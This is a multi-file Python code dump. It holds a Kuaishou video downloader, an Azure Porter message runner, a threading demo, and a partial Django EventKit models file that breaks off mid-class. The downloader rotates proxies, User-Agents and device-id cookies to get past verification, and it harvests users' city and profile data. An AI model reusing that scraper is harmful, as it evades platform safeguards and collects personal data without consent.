video_info['简介'] = re.search('<div class="caption-container">(.*?)</div>', html).group(1)
video_info['点赞'] = re.search('"likeCount":"(.*?)",', html).group(1)
video_info['评论'] = re.search('"commentCount":"(.*?)",', html).group(1)
video_info['链接'] = playUrl
except:
pass
global USER_ITEM
USER_ITEM = video_info
resp_pro = requests.get(playUrl, timeout=20)
resp_pro.raise_for_status()
content = resp_pro.content
with open(dir_name + vid + '.mp4', 'wb') as f:
f.write(content)
except Exception as e:
print('无水印下载失败',e)
try:
# Fetch the video link via the GraphQL API
payload = {"operationName": "SharePageQuery",
"variables": {"photoId": vid, "principalId": uid},
"query": "query SharePageQuery($principalId: String, $photoId: String) {\n feedById(principalId: $principalId, photoId: $photoId) {\n currentWork {\n playUrl\n __typename\n }\n __typename\n }\n}\n"
}
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
self.__headers_and['User-Agent'] = random.choice(UA_WEB_LIST)
self.__headers_and['Cookie'] = re.sub('did=.*?;', 'did=' + did + ';', self.__cookie)
resp = requests.post(DATA_URL, headers=self.__headers_and, json=payload,timeout=20,
# proxies = proxies
)
resp.raise_for_status()
resp_json = resp.json()
# Download the video
playUrl = resp_json['data']['feedById']['currentWork']['playUrl']
resp_pro = requests.get(playUrl, timeout=20)
resp_pro.raise_for_status()
content = resp_pro.content
path1 = './data/'
if not os.path.exists(path1):
os.makedirs(path1)
with open(dir_name + vid + '.mp4', 'wb') as f:
f.write(content)
except Exception as e:
print('有水印下载失败', e)
# 6. Fetch the user's profile information
def get_user_info(self,uid,work_list,nickname):
user_info = {}
video_list = []
for work in work_list:
video_item = {}
video_item['id'] = work['id']
video_item['封面'] = work['thumbnailUrl']
video_item['播放'] = work['counts']['displayView']
video_item['点赞'] = work['counts']['displayLike']
video_item['评论'] = work['counts']['displayComment']
video_item['链接'] = WORK_URL + video_item['id']
video_list.append(video_item)
user_info['id'] = work_list[1]['user']['id']
user_info['作者'] = work_list[1]['user']['name']
user_info['头像'] = work_list[1]['user']['avatar']
self.__headers_web['User-Agent'] = random.choice(UA_WEB_LIST)
self.__headers_web['Cookie'] = re.sub('did=.*?;', 'did=' + random.choice(DID_AND_LIST) + ';', self.__cookie)
payload = {"operationName": "sensitiveUserInfoQuery",
"variables": {"principalId": uid},
"query": "query sensitiveUserInfoQuery($principalId: String) {\n sensitiveUserInfo(principalId: $principalId) {\n kwaiId\n originUserId\n constellation\n cityName\n counts {\n fan\n follow\n photo\n liked\n open\n playback\n private\n __typename\n }\n __typename\n }\n}\n"}
resp = requests.post(DATA_URL, headers=self.__headers_web, json=payload,
# proxies=proxies
)
resp_json = resp.json()
userif = resp_json['data']['sensitiveUserInfo']
try:
user_info['星座'] = userif['constellation']
user_info['城市'] = userif['cityName']
user_info['粉丝'] = userif['counts']['fan']
user_info['关注'] = userif['counts']['follow']
user_info['作品'] = userif['counts']['photo']
except:
pass
global USER_ITEM
USER_ITEM = user_info
user_info['video_list'] = video_list
with open('./data/{}.json'.format(nickname),'w', encoding='utf8') as f:
json.dump({'item':user_info}, f, indent=4, ensure_ascii=False)
# Custom Qt thread that runs the background task
class Runthread(QThread):
# Define the signal object as a class member
signal = pyqtSignal(str)
def __init__(self,start_url,reviewEdit):
super(Runthread, self).__init__()
self.start_url = start_url
self.reviewEdit = reviewEdit
def __del__(self):
self.wait()
def run(self):
try:
self.list_flag = []
def start_spider(signal,list_flag):
# Advance the progress bar
for i in range(96):
time.sleep(0.6)
if len(list_flag) == 1:
break
# Note: the emitted type must match the str declared in signal = pyqtSignal(str)
signal.emit(str(i))
# Create the progress thread and start it
t = threading.Thread(target=start_spider, args=(self.signal,self.list_flag))
t.start()
# Start the crawler
spider_KS = spider_ks(self.start_url, cookie)
spider_KS.spider_start()
# Simulate a time-consuming operation
# sleep(40)
print('下载完成')
self.list_flag.append(0)
self.signal.emit(str(100))
except Exception as e:
print(e)
self.reviewEdit.setText('下载出错:{}'.format(e))
# Front-end GUI
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
# Text input field
self.ipput_Edit = QLineEdit()
self.ipput_Edit.setPlaceholderText('请输入快手用户分享链接或视频分享链接...')
# Download button
self.download_Button = QPushButton('下载')
# Connect the slot function
# download_Button.clicked.connect(self.pro_show)
self.download_Button.clicked.connect(lambda: self.buttonClicked())
# Progress bar
self.pro_bar = QProgressBar()
# Details display box
self.reviewEdit = QTextEdit()
# Set up the layout
grid = QGridLayout()
grid.setSpacing(10)
# Configure the grid layout
grid.addWidget(self.ipput_Edit, 1, 0)
grid.addWidget(self.download_Button, 1, 1)
grid.addWidget(self.pro_bar,2,0,1,2)
grid.addWidget(self.reviewEdit, 3, 0,5,2)
self.setLayout(grid)
self.thread = None
# Configure the window
self.resize(360, 250)
self.setWindowTitle('快手无水印视频下载')
self.show()
# Update the progress bar and button state
def call_backlog(self, msg):
# Pass the value emitted by the worker thread to the progress bar and display box
self.pro_bar.setValue(int(msg))
self.reviewEdit.setText(msg)
# When progress reaches 100, update the download button state
if msg == '100':
del self.thread
self.reviewEdit.setText('下载完成')
self.download_Button.disconnect()
self.download_Button.clicked.connect(QCoreApplication.quit)
self.download_Button.setEnabled(True)
self.download_Button.setText('完成')
# print(USER_ITEM)
if USER_ITEM.get('video_list') is not None:
del USER_ITEM['video_list']
for name,value in USER_ITEM.items():
self.reviewEdit.append(str(name) +':'+str(value))
def buttonClicked(self):
self.download_Button.setEnabled(False)
# Get the link entered by the user
input_text = ''.join(self.ipput_Edit.text().split('\n')).strip()
start_url = input_text
# start_url = 'https://v.kuaishouapp.com/s/fkbxgtrb '
try:
if 'https://v.kuaishouapp.com' not in start_url:
raise ValueError("必须是url链接")
# Update the button
self.download_Button.setText('下载中')
self.thread = Runthread(start_url,self.reviewEdit)
self.thread.signal.connect(self.call_backlog)  # connect the worker's signal back to the GUI
self.thread.start()
except Exception as e:
set_text = '链接不正确,请重新输入或换一个链接。{}'.format(e)
self.reviewEdit.setText(set_text)
self.download_Button.setEnabled(True)
if __name__ == "__main__":
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
# Share link for a personal profile page
# start_url = 'https://v.kuaishouapp.com/s/gZB2Lgx2 '
# Share link for a single video
# start_url = 'https://v.kuaishouapp.com/s/PpGiewIE '
'''
Adds a simple UI.
Automatically recognises either a profile share link or a single-video share link.
Downloads the watermark-free version first; if a verification challenge appears, falls back to the watermarked version.
Uses a random proxy, a random User-Agent and a random did for each request.
Requires a logged-in cookie.
'''
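# A minimal sketch of driving the crawler without the Qt front end: build spider_ks
# from a share link and a logged-in cookie string and start it. Both argument
# defaults below are placeholders, and this function is never called automatically.
def _example_headless_download(share_url='https://v.kuaishouapp.com/s/xxxxxxxx',
                               cookie_string='did=web_xxxxxxxxxxxxxxxx; ...'):
    spider = spider_ks(share_url, cookie_string)
    return spider.spider_start()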
|
runner.py
|
import threading
from multiprocessing import Process
import json
import socket
import asyncio
import logging
import sys
from resources.commands import build_porter_command, build_porter_command_for_outputs
from shared.config import get_config
from resources.helpers import get_installation_id
from resources.httpserver import start_server
from shared.logging import disable_unwanted_loggers, initialize_logging, get_message_id_logger, shell_output_logger # pylint: disable=import-error # noqa
from resources import strings, statuses # pylint: disable=import-error # noqa
from contextlib import asynccontextmanager
from azure.servicebus import ServiceBusMessage
from azure.servicebus.aio import ServiceBusClient, AutoLockRenewer
from azure.identity.aio import DefaultAzureCredential
# Initialise logging
logger_adapter = initialize_logging(logging.INFO, socket.gethostname())
disable_unwanted_loggers()
# Initialise config
try:
config = get_config(logger_adapter)
except KeyError as e:
logger_adapter.error(f"Environment variable {e} is not set correctly...Exiting")
sys.exit(1)
@asynccontextmanager
async def default_credentials(msi_id):
"""
Context manager which yields the default credentials.
"""
credential = DefaultAzureCredential(managed_identity_client_id=msi_id) if msi_id else DefaultAzureCredential()
yield credential
await credential.close()
async def receive_message(service_bus_client):
"""
This method is an async generator which receives messages from service bus
and yields those messages. If the yielded function return True the message is
marked complete.
"""
async with service_bus_client:
q_name = config["resource_request_queue"]
renewer = AutoLockRenewer(max_lock_renewal_duration=1800)
receiver = service_bus_client.get_queue_receiver(queue_name=q_name, auto_lock_renewer=renewer)
async with receiver:
received_msgs = await receiver.receive_messages(max_message_count=1, max_wait_time=5)
for msg in received_msgs:
result = True
message = ""
try:
message = json.loads(str(msg))
result = (yield message)
except (json.JSONDecodeError) as e:
logging.error(f"Received bad service bus resource request message: {e}")
if result:
logging.info(f"Resource request for {message} is complete")
else:
logging.error('Message processing failed!')
logger_adapter.info(f"Message with id = {message['id']} processed as {result} and marked complete.")
await receiver.complete_message(msg)
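# A minimal, self-contained sketch of the yield/asend handshake used by
# receive_message above: the consumer pulls one message with "async for",
# processes it, and reports the boolean result back via asend(); the generator
# finishing after asend() surfaces as StopAsyncIteration. Run it with
# asyncio.run(_example_yield_result_protocol()); it is not called anywhere.
async def _example_yield_result_protocol():
    async def one_message():
        result = yield "msg-1"
        logging.info(f"message processed as {result}")
    gen = one_message()
    try:
        async for message in gen:
            await gen.asend(message == "msg-1")
    except StopAsyncIteration:
        pass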
async def run_porter(command):
"""
Run a Porter command
"""
proc = await asyncio.create_subprocess_shell(
''.join(command),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
env=config["porter_env"])
stdout, stderr = await proc.communicate()
logging.info(f'run porter exited with {proc.returncode}')
result_stdout = None
result_stderr = None
if stdout:
result_stdout = stdout.decode()
shell_output_logger(result_stdout, '[stdout]', logger_adapter, logging.INFO)
if stderr:
result_stderr = stderr.decode()
shell_output_logger(result_stderr, '[stderr]', logger_adapter, logging.WARN)
return (proc.returncode, result_stdout, result_stderr)
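# A minimal sketch of the same subprocess capture pattern using a harmless shell
# command (assumes an "echo" command is available on the host). Run it with
# asyncio.run(_example_run_shell()); it is not called anywhere.
async def _example_run_shell():
    proc = await asyncio.create_subprocess_shell(
        "echo hello",
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE)
    stdout, stderr = await proc.communicate()
    return proc.returncode, stdout.decode(), stderr.decode()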
def service_bus_message_generator(sb_message, status, deployment_message, outputs=None):
"""
Generate a resource request message
"""
installation_id = get_installation_id(sb_message)
message_dict = {
"operationId": sb_message["operationId"],
"id": sb_message["id"],
"status": status,
"message": f"{installation_id}: {deployment_message}"}
if outputs is not None:
message_dict["outputs"] = outputs
resource_request_message = json.dumps(message_dict)
return resource_request_message
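# Illustrative only: the shape of the JSON payload that service_bus_message_generator
# produces. The ids below are placeholders; in real messages the prefix comes from
# get_installation_id(). Not called anywhere.
def _example_status_payload():
    return json.dumps({
        "operationId": "<operation-id>",
        "id": "<resource-id>",
        "status": strings.RESOURCE_STATUS_DEPLOYING,
        "message": "<installation-id>: Deployment job starting",
    })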
async def invoke_porter_action(msg_body, sb_client, message_logger_adapter) -> bool:
"""
Handle resource message by invoking specified porter action (i.e. install, uninstall)
"""
installation_id = get_installation_id(msg_body)
action = msg_body["action"]
message_logger_adapter.info(f"{installation_id}: {action} action starting...")
sb_sender = sb_client.get_queue_sender(queue_name=config["deployment_status_queue"])
# If the action is install/upgrade, post message on sb queue to start a deployment job
if action == "install" or action == "upgrade":
resource_request_message = service_bus_message_generator(msg_body, strings.RESOURCE_STATUS_DEPLOYING, "Deployment job starting")
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
# Build and run porter command (flagging if its a built-in action or custom so we can adapt porter command appropriately)
is_custom_action = action not in ["install", "upgrade", "uninstall"]
porter_command = await build_porter_command(config, message_logger_adapter, msg_body, is_custom_action)
returncode, _, err = await run_porter(porter_command)
# Handle command output
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n')) + " ; Command executed: ".join(porter_command)
resource_request_message = service_bus_message_generator(msg_body, statuses.failed_status_string_for[action], error_message)
# Post message on sb queue to notify receivers of action failure
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: Porter action failed with error = {error_message}")
return False
else:
# Get the outputs
# TODO: decide if this should "fail" the deployment
_, outputs = await get_porter_outputs(msg_body, message_logger_adapter)
success_message = f"{action} action completed successfully."
resource_request_message = service_bus_message_generator(msg_body, statuses.pass_status_string_for[action], success_message, outputs)
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: {success_message}")
return True
async def get_porter_outputs(msg_body, message_logger_adapter):
"""
Get outputs JSON from a Porter command
"""
porter_command = await build_porter_command_for_outputs(msg_body)
returncode, stdout, err = await run_porter(porter_command)
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n'))
message_logger_adapter.info(f"{get_installation_id(msg_body)}: Failed to get outputs with error = {error_message}")
return False, ""
else:
outputs_json = {}
try:
outputs_json = json.loads(stdout)
message_logger_adapter.info(f"Got outputs as json: {outputs_json}")
except ValueError:
message_logger_adapter.error(f"Got outputs invalid json: {stdout}")
return True, outputs_json
async def runner(process_num):
async with default_credentials(config["vmss_msi_id"]) as credential:
service_bus_client = ServiceBusClient(config["service_bus_namespace"], credential)
logger_adapter.info("Starting message receiving loop...")
while True:
logger_adapter.info(f'Process {process_num}: Checking for new messages...')
receive_message_gen = receive_message(service_bus_client)
try:
async for message in receive_message_gen:
logger_adapter.info(f"Process {process_num}: Message received with id={message['id']}")
message_logger_adapter = get_message_id_logger(message['id']) # logger includes message id in every entry.
result = await invoke_porter_action(message, service_bus_client, message_logger_adapter)
await receive_message_gen.asend(result)
except StopAsyncIteration: # the async generator when finished signals end with this exception.
pass
logger_adapter.info(f'Process {process_num}: All messages processed. Sleeping...')
await asyncio.sleep(30)
def start_runner_process(process_num):
asyncio.ensure_future(runner(process_num))
event_loop = asyncio.get_event_loop()
event_loop.run_forever()
logger_adapter.info("Started resource processor")
if __name__ == "__main__":
httpserver_thread = threading.Thread(target=start_server)
httpserver_thread.start()
logger_adapter.info("Started http server")
logger_adapter.info(f'Starting {str(config["number_processes_int"])} processes...')
for i in range(config["number_processes_int"]):
logger_adapter.info(f'Starting process {str(i)}')
process = Process(target=start_runner_process, args=(str(i),))
process.start()
|
multi-t.py
|
import threading
def calc_square(number):
print(f'Square: {number * number}')
def calc_quad(number):
print(f'Quad: {number * number * number * number}')
if __name__ == "__main__":
print(f'Starting execution of {__name__}...')
number = 7
thread1 = threading.Thread(target=calc_square, args=(number,))
thread2 = threading.Thread(target=calc_quad, args=(number,))
# Will execute both in parallel
thread1.start()
thread2.start()
# Wait for both threads to finish before the main thread
# continues
thread1.join()
thread2.join()
# Running the tasks in separate threads lets them overlap; note that for CPU-bound work the GIL limits true parallelism, so the benefit is mainly for I/O-bound tasks
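# A minimal alternative sketch using the standard-library thread pool: it runs the
# same two functions and waits for both, equivalent to the start/join pattern above.
# Not called automatically.
def _example_thread_pool(number=7):
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=2) as pool:
        pool.submit(calc_square, number)
        pool.submit(calc_quad, number)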
|
models.py
|
# -*- coding: utf-8 -*-
from __future__ import annotations
import copy
import json
import logging
import multiprocessing.dummy  # provides the thread-backed Process used in DataProvider.save
import uuid
from enum import Enum
from typing import TYPE_CHECKING, Dict, List, Type, Union, cast
import yaml
from django.contrib.auth.models import Group, User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.gis.db import models
from django.contrib.gis.geos import GeometryCollection, GEOSGeometry, MultiPolygon, Polygon
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django.core.serializers import serialize
from django.db.models import Case, Q, QuerySet, Value, When
from django.utils import timezone
from yaml import CDumper, CLoader
from eventkit_cloud import settings
from eventkit_cloud.core.helpers import get_or_update_session
from eventkit_cloud.core.models import (
AttributeClass,
CachedModelMixin,
DownloadableMixin,
GroupPermissionLevel,
LowerCaseCharField,
TimeStampedModelMixin,
UIDMixin,
)
from eventkit_cloud.jobs.enumerations import GeospatialDataType
from eventkit_cloud.utils.services import get_client
from eventkit_cloud.utils.services.check_result import CheckResult, get_status_result
from eventkit_cloud.utils.services.types import LayersDescription
from eventkit_cloud.utils.types.django_helpers import ListOrQuerySet
if TYPE_CHECKING:
from eventkit_cloud.utils.services.base import GisClient
logger = logging.getLogger(__name__)
# construct the upload path for export config files..
def get_upload_path(instance, *args):
"""
Construct the path to where the uploaded config file is to be stored.
"""
configtype = instance.config_type.lower()
# sanitize the filename here..
path = "export/config/{0}/{1}".format(configtype, instance.filename)
logger.debug("Saving export config to /media/{0}".format(path))
return path
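# Illustrative only: a stand-in object exposing the two attributes the function reads
# (config_type, filename); real callers pass a config model instance. Expected result:
# "export/config/preset/hdm_presets.xml". Not called anywhere.
def _example_upload_path():
    from types import SimpleNamespace
    fake_config = SimpleNamespace(config_type="PRESET", filename="hdm_presets.xml")
    return get_upload_path(fake_config)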
class MapImageSnapshot(DownloadableMixin, UIDMixin):
"""
A MapImageSnapshot is an image snapshot capturing a map in a particular state or time.
"""
class Meta:
db_table = "MapImageSnapshot"
def __str__(self):
return "MapImageSnapshot ({}), {}".format(self.uid, self.filename)
def clone(self):
self.id = None
self.uid = None
self.save()
return self
class DatamodelPreset(TimeStampedModelMixin):
"""
Model provides admin interface to presets.
These were previously provided by files like hdm_presets.xml / osm_presets.xml.
"""
name = models.CharField(max_length=10)
json_tags = models.JSONField(default=list)
class Meta:
db_table = "datamodel_preset"
def __str__(self):
return self.name
def to_dict(self):
return {"name": self.name, "json_tags": self.json_tags}
class License(TimeStampedModelMixin):
"""
Model to hold license information to be used with DataProviders.
"""
slug = LowerCaseCharField(max_length=40, unique=True, default="")
name = models.CharField(max_length=100, db_index=True)
text = models.TextField(default="")
def __str__(self):
return "{0}".format(self.name)
class UserLicense(TimeStampedModelMixin):
"""
Model to hold which licenses a User acknowledges.
"""
user = models.ForeignKey(User, on_delete=models.CASCADE)
license = models.ForeignKey(License, on_delete=models.CASCADE)
def __str__(self):
return "{0}: {1}".format(self.user.username, self.license.name)
class Projection(UIDMixin, TimeStampedModelMixin):
"""
Model for a Projection.
"""
name = models.CharField(max_length=100)
srid = models.IntegerField(unique=True)
description = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return "{0}".format(self.name)
class ExportFormat(UIDMixin, TimeStampedModelMixin):
"""
Model for a ExportFormat.
"""
safe_kwargs = [
"name",
"slug",
"description",
"cmd",
]
name = models.CharField(max_length=100)
slug = LowerCaseCharField(max_length=20, unique=True, default="")
description = models.CharField(max_length=255)
options = models.JSONField(default=dict, null=True, blank=True)
objects = models.Manager()
supported_projections = models.ManyToManyField(Projection, related_name="supported_projections")
class Meta: # pragma: no cover
managed = True
db_table = "export_formats"
def __str__(self):
return "{0}".format(self.name)
@classmethod
def get_or_create(cls, **kwargs):
blacklisted_keys = []
created = False
for _key in kwargs:
if _key not in cls.safe_kwargs:
blacklisted_keys.append(_key)
for _key in blacklisted_keys:
del kwargs[_key]
try:
format = cls.objects.get(slug=kwargs.get("slug").lower())
except ObjectDoesNotExist:
format = cls.objects.create(**kwargs)
created = True
return format, created
def get_supported_projection_list(self) -> List[int]:
supported_projections = self.supported_projections.all().values_list("srid", flat=True)
return list(supported_projections)
class DataProviderType(TimeStampedModelMixin):
"""
Model to hold types and supported exports for providers.
"""
id = models.AutoField(primary_key=True, editable=False)
type_name = models.CharField(verbose_name="Type Name", max_length=40, unique=True, default="")
supported_formats = models.ManyToManyField(ExportFormat, verbose_name="Supported Export Formats", blank=True)
use_bbox = models.BooleanField(verbose_name="Use bounding box to calculate area", default=False)
def __str__(self):
return "{0}".format(self.type_name)
class DataProvider(UIDMixin, TimeStampedModelMixin, CachedModelMixin):
"""
Model for a DataProvider.
"""
name = models.CharField(verbose_name="Service Name", unique=True, max_length=100)
slug = LowerCaseCharField(max_length=40, unique=True, default="")
label = models.CharField(verbose_name="Label", max_length=100, null=True, blank=True)
url = models.CharField(
verbose_name="Service URL",
max_length=1000,
null=True,
default="",
blank=True,
help_text="The SERVICE_URL is used as the endpoint for WFS, OSM, and WCS services. It is "
"also used to check availability for all OGC services. If you are adding a TMS "
"service, please provide a link to a single tile, but with the coordinate numbers "
"replaced by {z}, {y}, and {x}. Example: https://tiles.your-geospatial-site.com/"
"tiles/default/{z}/{y}/{x}.png",
)
preview_url = models.CharField(
verbose_name="Preview URL",
max_length=1000,
null=True,
default="",
blank=True,
help_text="This url will be served to the front end for displaying in the map.",
)
service_copyright = models.CharField(
verbose_name="Copyright",
max_length=2000,
null=True,
default="",
blank=True,
help_text="This information is used to display relevant copyright information.",
)
service_description = models.TextField(
verbose_name="Description",
null=True,
default="",
blank=True,
help_text="This information is used to provide information about the service.",
)
layer = models.CharField(verbose_name="Service Layer", max_length=100, null=True, blank=True)
export_provider_type = models.ForeignKey(
DataProviderType, verbose_name="Service Type", null=True, on_delete=models.CASCADE
)
max_selection = models.DecimalField(
verbose_name="Max selection area",
default=250,
max_digits=12,
decimal_places=3,
help_text="This is the maximum area in square kilometers that can be exported "
"from this provider in a single DataPack.",
)
level_from = models.IntegerField(
verbose_name="Seed from level",
default=0,
null=True,
blank=True,
help_text="This determines the starting zoom level the tile export will seed from.",
)
level_to = models.IntegerField(
verbose_name="Seed to level",
default=10,
null=True,
blank=True,
help_text="This determines the highest zoom level the tile export will seed to.",
)
config = models.TextField(
default="",
null=True,
blank=True,
verbose_name="Configuration",
help_text="""WMS, TMS, WMTS, and ArcGIS-Raster require a MapProxy YAML configuration
with a Sources key of imagery and a Service Layer name of imagery; the validator also
requires a layers section, but this isn't used.
OSM Services also require a YAML configuration.""",
)
DATA_TYPES = [
(GeospatialDataType.VECTOR.value, ("Vector")),
(GeospatialDataType.RASTER.value, ("Raster")),
(GeospatialDataType.ELEVATION.value, ("Elevation")),
(GeospatialDataType.MESH.value, ("Mesh")),
(GeospatialDataType.POINT_CLOUD.value, ("Point Cloud")),
]
data_type = models.CharField(
choices=DATA_TYPES,
max_length=20,
verbose_name="Data Type",
null=True,
default="",
blank=True,
help_text="The type of data provided (e.g. elevation, raster, vector)",
)
user = models.ForeignKey(User, related_name="+", null=True, default=None, blank=True, on_delete=models.CASCADE)
license = models.ForeignKey(
License, related_name="data_providers", null=True, blank=True, default=None, on_delete=models.CASCADE
)
zip = models.BooleanField(default=False)
display = models.BooleanField(default=False)
thumbnail = models.ForeignKey(
MapImageSnapshot,
blank=True,
null=True,
on_delete=models.SET_NULL,
help_text="A thumbnail image generated to give a high level" " preview of what a provider's data looks like.",
)
attribute_class = models.ForeignKey(
AttributeClass,
blank=True,
null=True,
on_delete=models.SET_NULL,
related_name="data_providers",
help_text="The attribute class is used to limit users access to resources using this data provider.",
)
the_geom = models.MultiPolygonField(
verbose_name="Covered Area",
srid=4326,
default="SRID=4326;MultiPolygon (((-180 -90,180 -90,180 90,-180 90,-180 -90)))",
)
class Meta: # pragma: no cover
managed = True
db_table = "export_provider"
# Check if config changed to updated geometry
__config = None
__url = None
__layer = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__config = self.config
self.__url = self.url
self.__layer = self.layer
def update_geom(self):
from eventkit_cloud.tasks.helpers import download_data
from eventkit_cloud.ui.helpers import file_to_geojson
geometry = None
if self.config != self.__config:
orig_extent_url = load_provider_config(self.__config).get("extent_url")
config = load_provider_config(self.config)
extent_url = config.get("extent_url")
if extent_url and extent_url != orig_extent_url:
random_uuid = uuid.uuid4()
session = get_or_update_session(**config)
if not extent_url:
return
output_file = download_data(task_uid=str(random_uuid), input_url=extent_url, session=session)
geojson = file_to_geojson(output_file)
geojson_geometry = geojson.get("geometry") or geojson.get("features", [{}])[0].get("geometry")
geometry = GEOSGeometry(json.dumps(geojson_geometry), srid=4326)
elif (self.url != self.__url) or (self.layer != self.__layer):
try:
client = self.get_service_client()
geometry = client.download_geometry()
except AttributeError as e:
# TODO: This fails in tests. How to handle failure to update geometry?
logger.info(e, exc_info=True)
if geometry:
self.the_geom = convert_polygon(geometry)
def get_service_client(self) -> GisClient:
url = self.url
if not self.url and "osm" in self.export_provider_type.type_name:
logger.error("Use of settings.OVERPASS_API_URL is deprecated and will be removed in 1.13")
url = settings.OVERPASS_API_URL
Client = get_client(self.export_provider_type.type_name)
config = None
if self.config:
config = load_provider_config(self.config)
return Client(url, self.layer, aoi_geojson=None, slug=self.slug, config=config)
def check_status(self, aoi_geojson: dict = None):
try:
client = self.get_service_client()
response = client.check(aoi_geojson=aoi_geojson)
except Exception as e:
logger.error(e, exc_info=True)
response = get_status_result(CheckResult.UNKNOWN_ERROR)
logger.error(f"An exception occurred while checking the {self.name} provider.", exc_info=True)
logger.info(f"Status of provider '{self.name}': {response}")
return response
def save(self, force_insert=False, force_update=False, *args, **kwargs):
# Something is closing the database connection which is raising an error.
# Using a separate process allows the connection to be closed in separate process while leaving it open.
proc = multiprocessing.dummy.Process(target=self.update_geom)
proc.start()
proc.join()
if not self.slug:
self.slug = self.name.replace(" ", "_").lower()
if len(self.slug) > 40:
self.slug = self.slug[0:39]
cache.delete(f"base-config-{self.slug}")
self.update_export_formats()
super(DataProvider, self).save(force_insert, force_update, *args, **kwargs)
def update_export_formats(self):
# TODO: Refactor utils/ogc_apiprocess into services.
from eventkit_cloud.utils.ogcapi_process import get_process_formats
process_formats = get_process_formats(self)
logger.info(f"Process_formats: {process_formats}")
for process_format in process_formats:
export_format, created = ExportFormat.get_or_create(**process_format)
if created:
# Use the value from process format which might be case sensitive,
# TODO: this will likely run into issues if two remote services use the same spelling but differ in case.
export_format.options = {"value": process_format.get("slug"), "providers": [self.slug], "proxy": True}
export_format.supported_projections.add(Projection.objects.get(srid=4326))
else:
providers = export_format.options.get("providers")
if providers:
providers = list(set(providers + [self.slug]))
export_format.options["providers"] = providers
else:
export_format.options = {"value": export_format.slug, "providers": [self.slug], "proxy": True}
export_format.save()
def __str__(self):
return "{0}".format(self.name)
@property
def metadata(self):
from eventkit_cloud.utils.mapproxy import get_mapproxy_metadata_url
if not self.config:
return None
config = yaml.load(self.config, Loader=CLoader)
url = config.get("sources", {}).get("info", {}).get("req", {}).get("url")
type = config.get("sources", {}).get("info", {}).get("type")
if url:
return {"url": get_mapproxy_metadata_url(self.slug), "type": type}
@property
def footprint_url(self):
from eventkit_cloud.utils.mapproxy import get_mapproxy_footprint_url
if not self.config:
return None
config = yaml.load(self.config, Loader=CLoader)
url = config.get("sources", {}).get("footprint", {}).get("req", {}).get("url")
if url:
return get_mapproxy_footprint_url(self.slug)
@property
def layers(self) -> LayersDescription:
"""
Used to populate the list of vector layers, typically for contextual or styling information.
:return: A list of layer names.
"""
if self.data_type != GeospatialDataType.VECTOR.value:
return {}
if self.config:
config = clean_config(str(self.config))
# As of EK 1.9.0 only vectors support multiple layers in a single provider
if self.export_provider_type.type_name in ["osm", "osm-generic"]:
return config
elif config.get("vector_layers"):
return {layer.get("name"): layer for layer in config.get("vector_layers", [])}
# Often layer names are configured using an index number but this number is not very
# useful when using the data so fall back to the slug which should be more meaningful.
if not self.layer: # check for NoneType or empty string
# TODO: support other service types
if self.export_provider_type.type_name in ["arcgis-feature"]:
return self.get_service_client().get_layers()
else:
return {self.slug: {"url": self.url, "name": self.slug}}
try:
int(self.layer) # noqa
return {
self.slug: {"url": self.url, "name": self.slug}
} # self.layer is an integer, so use the slug for better context.
except ValueError:
return {
self.layer: {"url": self.url, "name": self.layer}
} # If we got here, layer is not None or an integer so use that.
def get_use_bbox(self):
if self.export_provider_type is not None:
return self.export_provider_type.use_bbox
else:
return False
"""
Max datasize is the size in megabytes.
"""
@property
def max_data_size(self):
config = yaml.load(self.config, Loader=CLoader)
return None if config is None else config.get("max_data_size", None)
def get_max_data_size(self, user=None):
if not user:
return self.max_data_size
# the usersizerule set is looped instead of using a queryset filter so that it can be prefetched.
if user:
user_size_rule = list(
filter(lambda user_size_rule: user_size_rule.user == user, self.usersizerule_set.all())
)
if user_size_rule:
return user_size_rule[0].max_data_size
return self.max_data_size
def get_max_selection_size(self, user=None):
if not user:
return self.max_selection
# the usersizerule set is looped instead of using a queryset filter so that it can be prefetched.
if user:
user_size_rule = list(
filter(lambda user_size_rule: user_size_rule.user == user, self.usersizerule_set.all())
)
if user_size_rule:
return user_size_rule[0].max_selection_size
return self.max_selection
def get_data_type(self) -> str:
"""
This is used to populate the run metadata with special types for OSM and NOME.
This is used for custom cartography,
and should be removed if custom cartography is made configurable.
:param data_provider:
:return:
"""
if self.slug.lower() in ["nome", "osm"]:
return self.slug.lower()
else:
return str(self.data_type)
class DataProviderStatus(UIDMixin, TimeStampedModelMixin):
"""
Model that remembers the last recorded status of a data provider.
"""
status = models.CharField(max_length=10, blank=True)
status_type = models.CharField(max_length=25, blank=True)
message = models.CharField(max_length=150, blank=True)
last_check_time = models.DateTimeField(null=True)
related_provider = models.ForeignKey(DataProvider, on_delete=models.CASCADE, related_name="data_provider_status")
class Meta:
verbose_name_plural = "data provider statuses"
ordering = ["-last_check_time"]
class Region(UIDMixin, TimeStampedModelMixin):
"""
Model for a HOT Export Region.
"""
def __init__(self, *args, **kwargs):
if not args:  # Fixture loading passes positional args, so skip the conversion in that case.
kwargs["the_geom"] = convert_polygon(kwargs.get("the_geom")) or ""
kwargs["the_geom_webmercator"] = convert_polygon(kwargs.get("the_geom_webmercator")) or ""
kwargs["the_geog"] = convert_polygon(kwargs.get("the_geog")) or ""
super(Region, self).__init__(*args, **kwargs)
name = models.CharField(max_length=100, db_index=True)
description = models.CharField(max_length=1000, blank=True)
the_geom = models.MultiPolygonField(verbose_name="Geometry", srid=4326, default="")
the_geom_webmercator = models.MultiPolygonField(
